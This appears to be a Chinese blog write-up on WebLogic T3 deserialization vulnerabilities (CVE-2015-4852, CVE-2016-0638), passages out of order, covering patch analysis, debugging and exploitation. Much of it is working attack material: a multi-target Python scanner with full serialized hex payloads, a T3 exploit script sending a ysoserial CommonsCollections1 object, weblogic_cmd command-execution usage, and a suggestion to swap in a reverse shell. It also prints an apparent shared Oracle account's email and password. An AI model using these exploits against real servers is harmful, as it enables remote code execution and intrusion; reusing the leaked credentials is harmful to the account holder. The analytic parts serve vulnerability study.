用的common-collection1，MarshalledObject 在 (weblogic.corba.utils) 中 WEB-INFlibweblogic.jar!weblogiccorbautilsMarshalledObject.class

分析

同样是绕过黑名单，将反序列化的对象封装进了weblogic.corba.utils.MarshalledObject，然后再对MarshalledObject进行序列化，生成payload字节码。由于MarshalledObject不在WebLogic黑名单里，可正常反序列化，在反序列化时MarshalledObject对象调用readObject时对MarshalledObject封装的序列化对象再次反序列化，可以绕过黑名单的限制。

看下weblogic_cmd中如何构造的

handler是构造的cc对象，进入BypassPayloadSelector.selectBypass()

根据TYPE决定使用什么来构造payload，跟进到marshalledObject(payload)

将构造的cc对象封装进MarshalledObject对象marshalledObject，然后return，进入Serializables.serialize(_handler)

拿到序列化对象的字节码数组，然后通过t3协议发送出去，后面不在解释。

总的来说，就是将cc对象封装进MarshalledObject，MarshalledObject不在黑名单中，那么执行他的readObject()就可以触发cc链。

再来看下weblogic在哪触发的readObject()，断到MarshalledObject.class的48行。

这里的readObject()触发反序列化，怎么进入到readResolve()这个方法的？查看堆栈进入invokeReadResolve()

这里通过反射调用var1也就是MarshalledObject对象的readResolve()方法。var1中包含了我们恶意的序列化数据，它怎么传进来的？

进入堆栈中readOrdinaryObject()

private Object readOrdinaryObject(boolean var1) throws IOException {
    if (this.bin.readByte() != 115) {
        throw new InternalError();
    } else {
        ObjectStreamClass var2 = this.readClassDesc(false);
        var2.checkDeserialize();

        Object var3;
        try {
            var3 = var2.isInstantiable() ? var2.newInstance() : null;
        } catch (Exception var6) {
            throw (IOException)(new InvalidClassException(var2.forClass().getName(), "unable to create instance")).initCause(var6);
        }

        this.passHandle = this.handles.assign(var1 ? unsharedMarker : var3);
        ClassNotFoundException var4 = var2.getResolveException();
        if (var4 != null) {
            this.handles.markException(this.passHandle, var4);
        }

        if (var2.isExternalizable()) {
            this.readExternalData((Externalizable)var3, var2);
        } else {
            this.readSerialData(var3, var2);
        }

        this.handles.finish(this.passHandle);
        if (var3 != null && this.handles.lookupException(this.passHandle) == null && var2.hasReadResolveMethod()) {
            Object var5 = var2.invokeReadResolve(var3);
            if (var1 && var5.getClass().isArray()) {
                var5 = cloneArray(var5);
            }

            if (var5 != var3) {
                var3 = var5;
                this.handles.setObject(this.passHandle, var5);
            }
        }

        return var3;
    }
}

在这里调用了invokeReadResolve()，参数var3在上文经过this.readClassDesc().newInstance()拿到传入t3协议的MarshalledObject对象，具体做了什么处理不深入研究。

总结

t3传入MarshalledObject对象 -> readOrdinaryObject() 拿到MarshalledObject对象 -> invokeReadResolve() 反射调用MarshalledObject对象的readResolve() -> readObject()触发cc反序列化。

参考

1. jdk最好用1.6的，不然总是定位不到正确的函数。
2. https://www.cnblogs.com/afanti/p/10240232.html

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

官方漏洞通报时发布了两个补丁，分别是
1. p22248372_1036012_Generic
2. p20780171_1036_Generic

后来集成为一个补丁 p21984589_1036_Generic ，补丁下载需要Oracle的metalink账号也就是付费客户才可以下载，p21984589_1036_Generic 补丁我在网上没找到，只能退而求其次用两个补丁的方式了。

打补丁过程参考 weblogic10.3.6安装漏洞补丁

chmod -R 775 p20780171_1036_Generic p22248372_1036012_Generic
cd /root/Oracle/Middleware/utils/bsu/
./bsu.sh -install -patch_download_dir=/root/p20780171_1036_Generic - patchlist=EJUW -prod_dir=/home/weblogic/Oracle/Middleware/wlserver_10.3
./bsu.sh -install -patch_download_dir=/root/p22248372_1036012_Generic/ -patchlist=ZLNA -prod_dir=/root/Oracle/Middleware/wlserver_10.3/
source ./Oracle/Middleware/wlserver_10.3/server/bin/setWLSEnv.sh
java weblogic.version

如果出现 Java heap space 错误，把bsu.sh里的MEM_ARGS参数改为 -Xms512m -Xmx1024m 就行了。

可以看到打的两个补丁。

打了补丁之后使用CVE-2015-4852复现不成功，补丁确实有用。

查看weblogic的日志

java.io.InvalidClassException: Unauthorized deserialization attempt; org.apache.commons.collections.functors.ChainedTransformer 无效的类，可能是补丁做了反序列化类黑名单校验。

补丁里的黑名单

网上的分析文章说是一个ClassFilter类设置了黑名单，我们搜索一下具体的位置。

/root/Oracle/Middleware/patch_wls1036/patch_jars/BUG22248372_1036.jar 在这个包中，将Unauthorized deserialization attempt关键字打断点，执行CVE-2015-4852发现断在weblogic.rjvm.InboundMsgAbbrev.ServerChannelInputStream#resolveClass这里。

检查了反序列化的类，跟进isBlackListed()判断，发现了黑名单。

接下来进入正文，引入CVE-2016-0638这个CVE。

正文

前面我们说了CVE-2015-4852是通过黑名单的形式来修复了漏洞，主要作用在wlthint3client.jar包中以下三个位置

weblogic.rjvm.InboundMsgAbbrev.class :: ServerChannelInputStream
weblogic.rjvm.MsgAbbrevInputStream.class
weblogic.iiop.Utils.class

所以如果能找到可以在其readObject中创建自己的InputStream的对象，并且不是使用黑名单中的ServerChannelInputStream和MsgAbbrevInputStream的readObject进行的反序列化，最后调用readObject()方法进行反序列化的数据的读取，这样就可以执行含有恶意代码的序列化代码。然后就找到了weblogic.jms.common.StreamMessageImpl#readExternal

使用payload打过去，发现var4是接收的反序列化数据，var5执行了反序列化操作，执行了我们的恶意代码。

exp分析

https://github.com/5up3rc/weblogic_cmd 克隆下来，idea打开，配置运行参数。

-H "172.16.2.129" -C "ping -c 4 kaurg7.dnslog.cn" -B -os linux

main方法中首先获取参数，然后进入executeBlind()

然后进入WebLogicOperation.blindExecute()

然后配置cmd，接着进入SerialDataGenerator.serialBlindDatas()

接着进入构建反序列化对象

用的是common-collections1

然后进入BypassPayloadSelector.selectBypass(handler) 通过参数决定，默认使用streamMessageImpl

接着进入T3协议 T3ProtocolOperation.send(host, port, payload)，然后就是构造T3协议，发送出去。

输出的pahse1Str就是我们自己构造的序列化数据，到此就执行命令成功了。

还有一点就是输出的pahse1Str可以放到下面脚本中，直接用python更方便。

#!/usr/bin/env python
#coding:utf-8
import socket
import time
import re
import argparse
from multiprocessing.dummy import Pool

VUL=['CVE-2016-0638',
    'CVE-2016-3510',
    'CVE-2017-3248',
    'CVE-2018-2628',
    'CVE-2018-2893'
    ]
PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000004001e200000000000000100000572aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c6173733b7870737d00000001000d6a6176612e7574696c2e4d6170787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a6176612e6c616e672e53747a0000017f72696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e00167571007e001b00000001757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000003740007636d642e6578657400022f6374000463616c63740004657865637571007e001e000000017671007e002f7371007e0011737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000103f4000000000000078737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003d78',
    'aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b42787057412418757200025b42acf317f8060854e0020000787000000c0daced0005737200176a6176612e7574696c2e4c696e6b656448617368536574d86cd75a95dd2a1e020000787200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000103f400000000000027372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000949000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785a00155f75736553657276696365734d656368616e69736d4c00195f61636365737345787465726e616c5374796c6573686565747400124c6a6176612f6c616e672f537472696e673b4c000b5f617578436c617373657374003b4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f486173687461626c653b5b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff00740003616c6c70757200035b5b424bfd19156767db37020000787000000002757200025b42acf317f8060854e0020000787000000698cafebabe0000003200390a0003002207003707002507002601001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c756505ad2093f391ddef3e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010013537475625472616e736c65745061796c6f616401000c496e6e6572436c61737365730100354c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e736c65745061796c6f61643b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e730700270100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07002801003379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e736c65745061796c6f6164010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100146a6176612f696f2f53657269616c697a61626c65010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e01001f79736f73657269616c2f7061796c6f6164732f7574696c2f476164676574730100083c636c696e69743e0100116a6176612f6c616e672f52756e74696d6507002a01000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b0c002c002d0a002b002e01000463616c6308003001000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0c003200330a002b003401000d537461636b4d61705461626c6501001d79736f73657269616c2f50776e6572313930393035393330363833303701001f4c79736f73657269616c2f50776e657231393039303539333036383330373b002100020003000100040001001a000500060001000700000002000800040001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000002e000e0000000c000100000005000f003800000001001300140002000c0000003f0000000300000001b100000002000d00000006000100000033000e00000020000300000001000f0038000000000001001500160001000000010017001800020019000000040001001a00010013001b0002000c000000490000000400000001b100000002000d00000006000100000037000e0000002a000400000001000f003800000000000100150016000100000001001c001d000200000001001e001f00030019000000040001001a00080029000b0001000c00000024000300020000000fa70003014cb8002f1231b6003557b1000000010036000000030001030002002000000002002100110000000a000100020023001000097571007e000d000001d4cafebabe00000032001b0a0003001507001707001807001901001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75650571e669ee3c6d47180100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010003466f6f01000c496e6e6572436c61737365730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f79736f73657269616c2f7061796c6f6164732f7574696c2f47616467657473002100020003000100040001001a000500060001000700000002000800010001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000003b000e0000000c000100000005000f001200000002001300000002001400110000000a000100020016001000097074000450776e727077010078737d00000001001d6a617661782e786d6c2e7472616e73666f726d2e54656d706c61746573787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372003273756e2e7265666c6563742e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c6173733b7870737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c77080000001000000001740008663561356136303871007e0009787672001d6a617661782e786d6c2e7472616e73666f726d2e54656d706c617465730000000000000000000000787078',
    'aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078',
    'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707729000a556e69636173745265660000000005a2000000005649e3fd00000000000000000000000000000078',
    'aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000001251e200000000000000100000118aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e310000f1440000000046911fd80000000000000000000000000000007878',
    ]
VER_SIG=['weblogic.jms.common.StreamMessageImpl',
    'org.apache.commons.collections.functors.InvokerTransformer',
    '\$Proxy[0-9]+',
    '\$Proxy[0-9]+',
    'weblogic.jms.common.StreamMessageImpl'
    ]

def t3handshake(sock,server_addr):
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    print('[!]{}:{} handshake successful'.format(server_addr[0],server_addr[1]))

def buildT3RequestObject(dip,sock):
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    print('[!]{} send request payload successful,recv length:{}'.format(dip,len(sock.recv(2048))))

def sendEvilObjData(sock,data):
    payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    time.sleep(2)
    res='NO_DATA'
    try:
        res=sock.recv(4096)
    except socket.timeout:
        pass
    # print res.encode('hex')
    return res

def checkVul(res,server_addr,index):
    p=re.findall(VER_SIG[index], res, re.S)
    if len(p)>0:
        print('[+]%s:%d vul %s'%(server_addr[0],server_addr[1],VUL[index]))
        return True
    else:
        print('[-]%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]))
        return False

def run(dip,dport,index):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
    sock.settimeout(60)
    server_addr = (dip, dport)
    t3handshake(sock,server_addr)
    buildT3RequestObject(dip,sock)
    rs=sendEvilObjData(sock,PAYLOAD[index])
    checkVul(rs,server_addr,index)

def exp(target):
    dip,dport = target
    vuls = []
    for index in range(len(VUL)):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
            sock.settimeout(60)
            server_addr = (dip, dport)
            t3handshake(sock,server_addr)
            buildT3RequestObject(dip,sock)
            rs=sendEvilObjData(sock,PAYLOAD[index])
            if checkVul(rs,server_addr,index):
                vuls.append(VUL[index])
        except Exception as e:
            print('[-]{} fail:{}'.format(dip,str(e)))
    return {'ip':dip,'status':'ok' if len(vuls)>0 else 'fail','vuls':vuls}

def load_target_from_file(filename,port):
    iplist = []
    with open(filename) as f:
        for line in f:
            ip = line.strip()
            if len(ip)>0:
                iplist.append((ip,port))
    return iplist

def process_result(results):
    results_ok = []
    results_fail = []
    for r in results:
        if r['status'] == 'ok':
            results_ok.append('{}:{}'.format(r['ip'],','.join(r['vuls'])))
        else:
            results_fail.append(r['ip'])
    print('[+]vuls total:{}n{}'.format(len(results_ok), 'n'.join(results_ok)))

def main():
    parser = argparse.ArgumentParser(description='weblogic scanner')
    parser.add_argument('-f','--file',default=None,help='read target ip from file')
    parser.add_argument('-t','--target',default=None,help='target ip')
    parser.add_argument('-p','--port',default='7001',help=' server port,default is 7001')

    args = parser.parse_args()
    if not args.file is None:
        iplist = load_target_from_file(args.file,int(args.port))
        pool = Pool(10)
        results = pool.map(exp,iplist)
        pool.close()
        pool.join()
        process_result(results)
    elif not args.target is None:
        exp((args.target,int(args.port)))
    else:
        parser.print_help()
        print('You must set target ip or file!')

if __name__=="__main__":
    main()

参考链接

https://www.cnblogs.com/afanti/p/10240217.html
https://5alt.me/2018/04/weblogic%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B8%8E%E8%B0%83%E8%AF%95/
https://github.com/5up3rc/weblogic_cmd
https://paper.seebug.org/584/
https://github.com/pwntester/SerialKillerBypassGadgetCollection/blob/master/src/main/java/serialkiller/bypass/Weblogic1.java
https://xz.aliyun.com/t/1825/#toc-2

以下是关于CVE-2015-4852的补丁信息
https://www.oracle.com/security-alerts/alert-cve-2015-4852.html
https://updates.oracle.com/Orion/PatchDetails/process_form?aru=19496800&patch_password=&no_header=0
https://blog.csdn.net/zhouleiblog/article/details/50454925

Oracle的补丁季度更新报告
https://www.oracle.com/security-alerts/cpuapr2016v3.html#AppendixFMW
https://www.oracle.com/security-alerts/#CriticalPatchUpdates

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

环境

centos7 weblogic10.3.6 win10 idea

安装出现的问题

下载需要Oracle账户，网上百度了一个

2696671285@qq.com
密码：Oracle123

-bash: ./oepe-wls-indigo-installer-11.1.1.8.0.201110211138-10.3.6-linux32.bin: /lib/ld-linux.so.2: bad ELF interpreter: 没有那个文件或目录

解决

yum install zlib.i686 -y

可以图像化安装，也可以命令行静默安装，推荐还是图形化安装，或者docker也行。

复现

利用脚本如下

#!/usr/bin/env python
# coding: utf-8

import socket
import struct

def exp(host, port):

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_address = (host, int(port))
    data = ""
    try:
        sock.connect(server_address)
        # Send headers
        headers = 't3 12.2.1nAS:255nHL:19nn'.format(port)
        sock.sendall(headers)
        data = sock.recv(2)
        # java -jar ysoserial.jar CommonsCollections1 "touch /tmp/exp" > ./tmp
        f = open('./tmp', 'rb')
        payload_obj = f.read()
        f.close()
        payload1 = "000005ba016501ffffffffffffffff000000690000ea60000000184e1cac5d00dbae7b5fb5f04d7a1678d3b7d14d11bf136d67027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000".decode('hex')
        payload3 = "aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870774b210000000000000000000d31302e3130312e3137302e3330000d31302e3130312e3137302e33300f0371a20000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771d01a621b7319cc536a1000a3137322e31392e302e32f7621bb50000000078".decode('hex')
        payload2 = payload_obj
        payload = payload1 + payload2 + payload3

        payload = struct.pack('>I', len(payload)) + payload[4:]

        sock.send(payload)
        data = sock.recv(4096)
    except socket.error as e:
        print (u'socket 连接异常！')
    finally:
        sock.close()

exp('172.16.2.129', 7001)

利用成功会创建 /tmp/exp 文件，可以把poc改为反弹shell的payload。

远程调试

修改 /root/Oracle/Middleware/user_projects/domains/base_domain/bin/setDomainEnv.sh 在上方加入两行debug配置

debugFlag="true"
export debugFlag

打开idea，创建一个Java web工程，从Linux中把 /root/Oracle/Middleware/modules目录拷出来，在idea中File->Project Structure里找到Libraries，添加modules。

然后配置远程调试，填写远程IP以及端口。

重新启动weblogic

因为我们知道是 commons-collections的InvokerTransformer出现的问题，所以断点直接下在transform()，开启idea的debug，然后用exp打过去，发现断点已经成功。

漏洞分析

先上堆栈调用链

